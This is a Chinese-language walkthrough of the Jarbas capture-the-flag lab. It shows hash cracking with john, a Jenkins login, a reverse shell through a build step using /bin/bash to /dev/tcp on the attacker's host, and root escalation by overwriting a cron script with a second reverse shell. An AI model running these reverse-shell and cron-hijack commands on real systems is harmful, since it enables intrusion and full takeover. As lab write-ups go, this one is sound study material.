jarbas
扫描
使用目录扫描扫出来两个页面
8080端口的扫描结果如图
其中8080应该是后台登录框
robots文件内容如图
渗透
进入第一个页面
发现疑似加密的东西
tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98
改密码为md5密码,使用john解码
john pojie1.txt --format=RAW-MD5
marianna
vipsu
italia99
此处直接对应密码是无法登陆的,最后尝试的发现正确可登录的对应为
eder:vipsu
(此处尝试了使用bp交叉匹配,但是最后返回值完全相同无法判别哪个是正确的,可能是因为用户密码被转义了,不确定)
这个是jenkins工具平台,网上查阅相关漏洞操作
最常用的是执行shell
操作如图
/bin/bash -i >& /dev/tcp/10.4.7.138/12138 0>&1
kali开启监听后点击此处执行shell
成功反弹
提权
此处经过常规的一系列尝试,并没有有效的
查阅学习后,尝试走计划任务方向
cat /etc/crontab
#也可能是cron.d
发现有一个五分钟执行一次的任务
开启一个新的监听端口9999
echo "/bin/bash -i >& /dev/tcp/10.4.7.138/9999 0>&1" > /etc/script/CleaningScript.sh
将反弹shell命令覆盖原脚本文件,等待五分钟执行
反弹过后即提权成功